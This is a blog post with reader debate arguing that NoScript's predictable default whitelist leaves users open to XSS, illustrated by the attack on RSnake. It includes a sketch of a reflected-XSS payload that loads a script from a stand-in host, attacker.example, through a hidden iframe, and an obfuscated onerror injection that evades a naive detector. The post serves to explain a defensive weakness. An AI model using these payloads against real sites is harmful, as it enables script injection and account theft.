Predictable whitelists strike again

A little more than half a year ago I wrote an article on how security solutions using whitelists are better than those using blacklists. At the same time I noted that even using whitelists is not always enough, for example when your whitelist is predictable and the attacker can make sure the whitelisting rule applies to him. The NoScript extension was the example I used, and its author reacted by adding “XSS protection”, assuming that this would invalidate my claims.

Well, it doesn’t. XSS is a very complex problem, and simple solutions to it usually turn out to be wrong. This was confirmed once more by the attack on the security expert RSnake. The attackers knew that RSnake uses NoScript, so they simply included NoScript in their plan. They guessed that RSnake would whitelist his own site, found an XSS vulnerability there, and used an XSS attack NoScript wouldn’t stop; had their guess not been wrong, they would have been able to run JavaScript despite NoScript. That’s exactly the kind of attack I spoke about in my article.
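
To illustrate the principle rather than the actual exploit (which was never published in full detail), consider the following sketch. The domains and the vulnerable parameter are made up: attacker.example is not whitelisted, trusted.example is, and trusted.example reflects a query parameter into its page without escaping. The attacker’s page doesn’t need to run any JavaScript itself; plain markup is enough to bounce the payload off the whitelisted site.

```typescript
// Hypothetical sketch of a "predictable whitelist" attack; all names are made up.
// Assumptions: trusted.example is on the victim's NoScript whitelist and reflects
// its "q" parameter unescaped; attacker.example is not whitelisted, so NoScript
// blocks its scripts. That doesn't matter, because the attacker's page needs none.

// Script the attacker wants to execute in the context of the whitelisted site:
const payload = '<script src="https://attacker.example/evil.js"></script>';

// Static markup served by attacker.example. A hidden iframe pointing at the
// vulnerable URL is enough; the reflected payload then runs on trusted.example,
// which the whitelist tells NoScript to allow.
const attackPage = `
  <iframe src="https://trusted.example/search?q=${encodeURIComponent(payload)}"
          style="display:none"></iframe>`;

console.log(attackPage);
```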

Now RSnake was in a much better situation than the majority of NoScript users. Not only did he notice the attack executing in the background, he probably didn’t even have a single entry in his NoScript whitelist to be exploited. Too bad that 99% of users never configure anything, meaning that they still use the default whitelist entries that NoScript comes with and that I warned against a while ago. Instead of cutting this list down to the bare minimum (ideally: zero), the author kept four (!) of his domains on the default whitelist, and Google ads, just to make sure he still gets money from the people forced to visit his site on each NoScript update (which happens approximately once per week).

To reiterate what I already stated before: if Firefox users ever come under attack (which has hardly ever happened so far, at least if you run the latest Firefox version), NoScript will not help the vast majority of users. It tends to stop lots of harmless (meaning useful) stuff but cannot be relied on when it comes to the attacks it is supposed to stop.
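
Part of the reason it cannot be relied on is that recognizing an XSS attack in a request is a pattern-matching problem, and any fixed set of patterns lets some injections through. The filter below is a deliberately naive stand-in for that approach, not NoScript’s actual (far more elaborate) code, but it shows how a harmless request and an obfuscated injection can look equally innocent to such a check.

```typescript
// Deliberately naive pattern-based "XSS detector", a stand-in for the general
// approach only; NoScript's real filters are much more elaborate.
const looksLikeXss = (url: string): boolean =>
  /<script|javascript:/i.test(decodeURIComponent(url));

// A harmless request and an obfuscated injection through the same parameter:
const harmless  = "https://trusted.example/search?q=%3Cb%3Ehello%3C%2Fb%3E";
const injection = "https://trusted.example/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E";

console.log(looksLikeXss(harmless));  // false: allowed, as it should be
console.log(looksLikeXss(injection)); // false: also allowed, the filter misses it
```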

Comments

  • ecjs

    Nice point, once again.

  • pirlouy

    and Google ads, just to make sure he still gets money from the people forced to visit his site on each NoScript update (which happens approximately once per week)

    Wow… Nice one. :P
    It would be cool if Giorgio answered this (here or in his blog). And since he’s cool, I’m sure he’ll answer. :-)

    Wladimir Palant

    I doubt that he will answer. It isn’t like I didn’t discuss this issue with him. However, it seems that his ad income is more important than the security of NoScript users.

  • pirlouy

    I don’t want to try NoScript again, but I suppose “google.com” is in the whitelist because of Gmail.

    But since there are several redirections on his site, it’s possible it is in his whitelist for another reason…

    Wladimir Palant

    Google Ads are not served from google.com – googlesyndication.com is the domain, and it is used only for Google Ads. And it is on the whitelist by default.

  • Computer Literate

    The bit about whitelisting googlesyndication.com reminds me of something Blake Ross wrote:

    “Have you heard the one about how [Netscape] whitelisted themselves? This is one of my favorite anecdotes, and though my memory is fuzzy about the exact timeline and versions involved, it goes something like this: Mozilla implements popup blocking and releases a milestone to great acclaim. Netscape soon follows with its own release based on the Mozilla offering. Because Netscape is Mozilla at its core, the press is naturally expecting it to have popup blocking. It doesn’t, because—lo and behold—some AOL/Netscape web properties use popup ads, and heaven forbid those get blocked! After a thorough public lashing, Netscape goes back to the drawing board and finally puts out a release that blocks popups. The catch: a whitelist, buried in preferences and thus out of reach of most users, that permits AOL web properties to continue opening popup ads. One of these properties just so happened to be Netscape.com.

    “Guess what the browser’s default homepage was.

    “The user started up his shiny new browser—NOW WITH POPUP BLOCKING!—and got a popup ad.

    “Netscape isn’t doing too well these days.”

    Original blog post

  • tlu

    Wladimir,

    I think you are wrong here. This attack didn’t have anything to do with RSnake’s whitelisting his website in NoScript. RSnake himself mentioned a “vuln in NoScript” (which has been fixed in the meantime). Whitelisting wasn’t the culprit, as “since version 1.1.4.9 NoScript checks also requests started from whitelisted origins for specific suspicious URL patterns landing on other trusted sites: if a potential XSS attack is detected, even if coming from a trusted source, filters are promptly triggered” (quoted from the NoScript site).

    Wladimir Palant

    No, I think I got it right. Of course, RSnake doesn’t describe the attack in all its details, but my understanding is that “vuln in NoScript” means an XSS attack that wasn’t stopped by NoScript (simply because you cannot distinguish an XSS attack from a correct request that easily). So we are back to the problem where a non-trusted site can XSS into a whitelisted site and run JavaScript by doing that (the problem that was “solved” by NoScript 1.1.4.9). This is the classic case where you solve one problem by creating an even bigger problem – now everything that the XSS protection in NoScript misses is a vulnerability in NoScript (and it misses a lot).

  • tlu

    So what you’re saying is that the anti-XSS filters in NoScript are not perfect, which may be true (although Giorgio is constantly updating them). This confirms that whitelisting per se isn’t the problem.

  • tlu

    Oh, just another remark: if NoScript’s XSS protection isn’t really perfect, to what extent is this creating “an even bigger problem” compared to not using NoScript at all???

    Wladimir Palant

    I was referring to the way Giorgio “fixed” the issue of predictable whitelists. Instead of actually fixing it, he created an even bigger issue. Now NoScript is relying heavily on the quality of its XSS protection – a hole in this protection brings back the old whitelists issue and makes NoScript useless. And since the quality of the XSS protection isn’t good enough (cannot be good enough), a somewhat determined attacker can still abuse predictable whitelists. And I simply don’t think that something that relies on the attacker being stupid can be called a security solution (stupid attackers usually aren’t dangerous anyway).

  • tlu

    “The quality of the XSS protection isn’t good enough”? Well, first of all, Sirdarckcat and kuza55 needed several weeks to find out, by combining three weaknesses (one of them specific to ha.ckers.org), how to bypass NoScript – so it doesn’t seem to be that easy. And while Giorgio himself surely wouldn’t rule out any loopholes in NoScript’s anti-XSS code, it’s remarkable that none of the hundreds or thousands of obfuscated XSS vectors posted on sla.ckers.org were able to bypass it.

    But if you really think that it’s not good enough, why don’t you prove it by posting your results in http://sla.ckers.org/forum/read.php?12,17238 ?

  • kuza55

    @tlu:

    This is a bit late, but I wanted to mention it anyway; it took only an hour or two to get from finding a vulnerability in RSnake’s site to having a working attack which evaded NoScript, and I have no idea where you got your several weeks from…..

    Wladimir Palant

    Thanks, that’s what I suspected.

  • Great Wizard

    You can also say, by the same logic, that all automated defense programs are useless. The fact that a human hacker who specifically targets someone is able to breach his security to some extent doesn’t mean that NoScript is useless. It’s useful to most users who won’t be attacked directly but might get bothered by various malicious scripting on the web.

  • SZ

    I quite agree.

    Also, if you are saying that the XSS protection is inevitably going to fail, then you might as well scrap the whole thing. But then you would have NO protection in that category, which is the reason it was implemented in the first place!

    From what I have read so far, it seems you are saying that whitelisting is not what should be used, but blacklisting instead.

    If this is the case, I can see several weaknesses. First, a blacklist will inevitably make a mistake and not list a vendor, thus enabling an attack. The attacker could also feasibly use an address that is not blacklisted. PLUS, the list would have to be huge if it were to provide adequate protection, thus slowing the browser down and increasing its memory usage.

    Have a good day. :p

  • ma

    SZ,

    The first sentence in the article says: “security solutions using whitelists are better than those using blacklists”.

    The whitelist should ideally start out with zero entries. However, I still want the NoScript author to receive ad revenue.

  • Matt P

    I use NoScript not for all-encompassing protection against a directed attack against me, but for protection from accidentally visiting malicious websites and annoying ad sites (which may dump adware on your computer, often operating from whitelisted sites).

    If I visit a website I thought was safe and it turns out not to be, NoScript protects me and prevents the bad scripts from running. These kinds of websites are not directly attacking me or trying to circumvent my NoScript, they are simply trying to dump whatever they can on whoever comes across their website.